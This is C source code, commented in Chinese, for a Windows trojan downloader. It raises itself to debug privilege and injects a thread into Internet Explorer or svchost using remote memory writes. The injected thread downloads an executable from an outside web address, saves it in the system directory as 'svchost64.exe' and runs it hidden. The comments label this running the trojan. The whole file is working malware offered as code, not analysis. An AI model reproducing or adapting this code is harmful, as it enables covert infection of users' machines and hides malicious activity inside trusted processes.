#include "stdafx.h”
#include “stdio.h”
#include “string.h”
#include <windows.h>
#include <wininet.h>
#include “tlhelp32.h”
#pragma comment(lib,”wininet.lib“)
/***********************************************/
typedef HINSTANCE (__stdcall *fun_ShellExecute)(HWND hWnd, //定義 ShellExecute
LPCTSTR lpOperation,
LPCTSTR lpFile,
LPCTSTR lpParameters,
LPCTSTR lpDiretory,
INT nShowCmd);
typedef int (__stdcall *fun_MessageBox)(HWND hWnd, LPCTSTR lpszText, //定義MessageBoxA原型
LPCTSTR lpszCaption, UINT nType);
// define functions in kernel32.dll
typedef HANDLE (__stdcall *fun_CreateFile)( LPCTSTR, DWORD, DWORD, //定義CreateFileA
LPSECURITY_ATTRIBUTES,
DWORD, DWORD, HANDLE );
typedef BOOL (__stdcall *fun_WriteFile)( HANDLE, LPCVOID, DWORD, //定義WriteFile
LPDWORD, LPOVERLAPPED );
typedef BOOL (__stdcall *fun_CloseHandle)( HANDLE hObject ); //定義CloseHandle
typedef HMODULE (__stdcall *fun_GetModuleHandle)(LPCTSTR); //定義GetModuleHandle
typedef FARPROC (__stdcall *fun_GetProcAddress)(HMODULE, LPCTSTR); //定義GetProcAddress
typedef HINSTANCE (__stdcall *fun_LoadLibrary)(LPCTSTR); //定義LoadLibraryA
// define functions in wininet.dll
typedef HINTERNET (__stdcall *fun_InternetOpen)(IN LPCTSTR lpszAgent, //定義InternetOpen
IN DWORD dwAccessType,
IN LPCTSTR lpszProxyByName,
IN LPCTSTR lpszProxyByPass,
IN DWORD dwFlags);
typedef HINTERNET (__stdcall *fun_InternetOpenUrl)(IN HINTERNET hInternet,//定義InternetOpenUrl
IN LPCTSTR lpszUrl,
IN LPCTSTR lpszHeaders OPTIONAL,
IN DWORD dwHeadersLength,
IN DWORD dwFlags,
IN DWORD dwContext);
typedef HINTERNET (__stdcall *fun_InternetReadFile)(IN HINTERNET hFile, //定義InternetReadFile
IN LPVOID lpBuffer,
IN DWORD dwNumberOfBytesToRead,
OUT LPDWORD lpdwNumberOfBytesRead);
typedef HINTERNET (__stdcall *fun_InternetCloseHandle)(IN HINTERNET hInternet); //定義InternetCloseHandle
typedef struct tag_Inject // define a structure to copy to distance process
{
fun_GetModuleHandle GetModuleHandle;
fun_GetProcAddress GetProcAddress;
fun_LoadLibrary LoadLibrary;
char szKernel[32];
char szUser[32];
char szNet[32];
char szShell[32];
char szMessageBox[32];
char szInternetOpen[32];
char szInternetOpenUrl[MAX_PATH];
char szInternetReadFile[128];
char szInternetCloseHandle[32];
char szCreateFile[32];
char szWriteFile[32];
char szCloseHandle[32];
char szShellExecute[32];
char szHeader[16];
char szInterFlag[32];
char szOpenFlag[10];
char szUrlAddr[MAX_PATH];
char szUrlAddr1[MAX_PATH];
char szFilePath[MAX_PATH];
char szFilePath1[MAX_PATH];
}Inject;
/***************************************/
/************************************************/
static BOOL ThreadProc(Inject* Inject_info)
{
HMODULE hKernel32, hUser32, hWininet, hShell32; //子產品句柄
fun_InternetOpen j_InternetOpen; //定義函數指針
fun_InternetOpenUrl j_InternetOpenUrl;
fun_InternetReadFile j_InternetReadFile;
fun_InternetCloseHandle j_InternetCloseHandle;
fun_CreateFile j_CreateFile;
fun_WriteFile j_WriteFile;
fun_CloseHandle j_CloseHandle;
fun_MessageBox j_MessageBox;
fun_ShellExecute j_ShellExecute;
hKernel32 = Inject_info->GetModuleHandle(Inject_info->szKernel); //隐式加載DLL
if (NULL == hKernel32) //加載失敗
{
hKernel32 = Inject_info->LoadLibrary(Inject_info->szKernel); //顯示加載
if (NULL == hKernel32) //顯示加載失敗
{
return FALSE;
}
}
hUser32 = Inject_info->GetModuleHandle(Inject_info->szUser);
if (NULL == hUser32)
{
hUser32 = Inject_info->LoadLibrary(Inject_info->szUser);
if (NULL == hUser32)
{
return FALSE;
}
}
hWininet = Inject_info->GetModuleHandle(Inject_info->szNet);
if (NULL == hWininet)
{
hWininet = Inject_info->LoadLibrary(Inject_info->szNet);
if (NULL == hWininet)
{
return FALSE;
}
}
hShell32 = Inject_info->GetModuleHandle(Inject_info->szShell);
if (NULL == hShell32)
{
hShell32 = Inject_info->LoadLibrary(Inject_info->szShell);
if (NULL == hShell32)
{
return FALSE;
}
}
j_InternetOpen = (fun_InternetOpen)Inject_info->GetProcAddress(hWininet, //綁定 InternetOpen
Inject_info->szInternetOpen);
j_InternetOpenUrl = (fun_InternetOpenUrl)Inject_info->GetProcAddress(hWininet, //綁定 InternetOpenUrl
Inject_info->szInternetOpenUrl);
j_InternetReadFile = (fun_InternetReadFile)Inject_info->GetProcAddress(hWininet, //綁定 InternetReadFile
Inject_info->szInternetReadFile);
j_InternetCloseHandle = (fun_InternetCloseHandle)Inject_info->GetProcAddress(hWininet, //綁定 InternetCloseHandle
Inject_info->szInternetCloseHandle);
j_CreateFile = (fun_CreateFile)Inject_info->GetProcAddress(hKernel32, //綁定 CreateFile
Inject_info->szCreateFile);
j_WriteFile = (fun_WriteFile)Inject_info->GetProcAddress(hKernel32, //綁定 WriteFile
Inject_info->szWriteFile);
j_CloseHandle = (fun_CloseHandle)Inject_info->GetProcAddress(hKernel32, //綁定 CloseHandle
Inject_info->szCloseHandle);
j_MessageBox = (fun_MessageBox)Inject_info->GetProcAddress(hUser32, //綁定 MessageBox
Inject_info->szMessageBox);
j_ShellExecute = (fun_ShellExecute)Inject_info->GetProcAddress(hShell32, //綁定 ShellExecute
Inject_info->szShellExecute);
HINTERNET hNet, hFile; //定義網絡句柄和檔案句柄
hNet = j_InternetOpen(Inject_info->szInterFlag, INTERNET_OPEN_TYPE_PRECONFIG,
NULL, NULL, 0); //打開網絡并傳回網絡句柄
if (NULL == hNet) //打開網絡出錯
{
return FALSE;
}
hFile = j_InternetOpenUrl(hNet, Inject_info->szUrlAddr, Inject_info->szHeader,
strlen(Inject_info->szHeader),
INTERNET_FLAG_DONT_CACHE|INTERNET_FLAG_RELOAD, 0); //打開指定的URL并傳回請求的URL的資源句柄
if (NULL == hFile) //打開網絡位址出錯
{
return FALSE;
}
char buff[1024]; //資料傳輸緩存
DWORD dwRead, //位元組數
dwWritten = NULL; //實際寫入的位元組數
HANDLE hCreateFile = j_CreateFile(Inject_info->szFilePath, GENERIC_READ|GENERIC_WRITE, //始終建立檔案
0, NULL, CREATE_ALWAYS, 0 ,NULL);
if (NULL == hCreateFile) //建立檔案出錯!
{
return FALSE;
}
while(j_InternetReadFile(hFile, buff, 1023, &dwRead))
{
if (0 == dwRead) //如果傳輸出錯,退出
break;
j_WriteFile(hCreateFile, buff, dwRead, &dwWritten, NULL); //将讀取到的資料寫入本地檔案
}
j_InternetCloseHandle(hNet); //關閉網絡句柄
j_InternetCloseHandle(hFile); //關閉網絡檔案句柄
j_CloseHandle(hCreateFile); //關閉本地檔案句柄
j_ShellExecute(NULL, NULL, Inject_info->szFilePath, NULL, NULL, SW_HIDE); //運作木馬
return TRUE;
}
static void AddressFlag(void)
{
}
/****************************************************************************************************************/
/***************************************************************************************/
/* 提升目前程序的權限到 DEBUG */
/***************************************************************************************/
/****************************************************************************************************************/
BOOL ImprovePrivilege() //将程序提權
{
HANDLE hToken = NULL ; //令牌句柄
BOOL bRet = FALSE; //傳回執行結果
TOKEN_PRIVILEGES tp = {1, {0, 0, SE_PRIVILEGE_ENABLED}}; //填充權限令牌結構
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); //查詢是否具有調試權限
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken); //打開程序權限令牌
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof tp, 0, 0); //為程序申請 DEBUG 權限
bRet = (GetLastError() == ERROR_SUCCESS); //檢測是否執行成功
return bRet;
}
/****************************************************************************************************************/
/***************************************************************************************/
/* 得到IExplore.exe的程序ID */
/***************************************************************************************/
/****************************************************************************************************************/
DWORD Get_ProcID()
{
char* strProc = new char[256];
HANDLE hSnap; //快照句柄
PROCESSENTRY32 ppe; //程序結構資訊
hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); //建立系統程序快照
if (!ImprovePrivilege()) //提升本程序權限
{
return FALSE;
}
ppe.dwSize = sizeof( PROCESSENTRY32 ); //計算結構大小
Process32First( hSnap, &ppe ); //找到第一個程序
while ( 1 ) //判斷系統中的程序是否有IE的程序
{
strcpy(strProc, ppe.szExeFile); //轉存
strProc = strlwr(strProc); //轉換為小寫
if (0 == strcmp(strProc, “iexplore.exe“))//判斷是否是 IE
{
return ppe.th32ProcessID;
}
else if (0 == strcmp(strProc, “svchost.exe“))//判斷是否是 svchost
{
return ppe.th32ProcessID;
}
if ( !Process32Next( hSnap, &ppe ))
{
break;
}
}
CloseHandle( hSnap );
return 0;
}
/*************************************/
/*************************************************************************************/
/* 将 ThreadProc 函數以插入線程的形式在浏覽器程序中運作 */
/*************************************/
/*************************************/
BOOL InsertThread()
{
char szSystemRoot[MAX_PATH];
PDWORD pdwRemote = NULL; //申請遠端空間位址
const int iCodeSize = ((LPBYTE)AddressFlag - (LPBYTE)ThreadProc);//計算代碼長度
Inject *InjectRemote = NULL; //将Inject複制到遠端程序空間中去
DWORD dwThread = NULL,
dwOut = NULL,
dwProc = Get_ProcID();
HANDLE hProc = NULL;
const DWORD cbMemSize = iCodeSize + sizeof(Inject) + 3; //需要的記憶體塊大小
Inject Inject_stru = {NULL, NULL, NULL,
“kernel32.dll“,
“user32.dll“,
“wininet.dll“,
“shell32.dll“,
“MessageBoxA“,
“InternetOpenA“,
“InternetOpenUrlA“,
“InternetReadFile“,
“InternetCloseHandle“,
“CreateFileA“,
“WriteFile“,
“CloseHandle“,
“ShellExecuteA“,
“Accept: */*/r/n/r/n“,
“RookIE/1.0“,
“wba“,
“http://www.hf-hx.com/music/x.exe“,
“”}; //初始化結構
GetSystemDirectory(szSystemRoot, sizeof(szSystemRoot)); //得到系統目錄
strcat(szSystemRoot, “//svchost64.exe“); //構造檔案名(含路徑)
strcpy(Inject_stru.szFilePath, szSystemRoot); //傳遞給Inject 結構中的szFilePaht
HMODULE hKernel32 = GetModuleHandle(”kernel32.dll“);
Inject_stru.GetModuleHandle = (fun_GetModuleHandle)GetProcAddress(hKernel32, “GetModuleHandleA“);//綁定GetModuleHandle
Inject_stru.GetProcAddress = (fun_GetProcAddress)GetProcAddress(hKernel32, “GetProcAddress“); //綁定GetProcAddress
Inject_stru.LoadLibrary = (fun_LoadLibrary)GetProcAddress(hKernel32, “LoadLibraryA“);//綁定LoadLibrary
hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProc); //以最高權限打開浏覽器程序
if (NULL == hProc)
{
return FALSE;
}
pdwRemote = (PDWORD)VirtualAllocEx(hProc, NULL, cbMemSize, MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); //在遠端空間中申請記憶體塊
if (NULL == pdwRemote)
{
return FALSE;
}
if (!WriteProcessMemory(hProc, pdwRemote, (LPVOID)ThreadProc, cbMemSize, &dwOut)) //向遠端程序寫入功能代碼
{
return FALSE;
}
InjectRemote = (Inject*)(((LPBYTE)pdwRemote) + ((iCodeSize + 4) & ~3));
if (!WriteProcessMemory(hProc, InjectRemote, &Inject_stru, sizeof(Inject_stru), &dwOut)) //向遠端線程寫入結構資料
{
return FALSE;
}
if (NULL == CreateRemoteThread(hProc, NULL, 65535, (LPTHREAD_START_ROUTINE)pdwRemote, InjectRemote, 0, NULL)) //建立程序線程
{
return FALSE;
}
return TRUE;
}
/******************************************/
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
InsertThread();
return 0;
}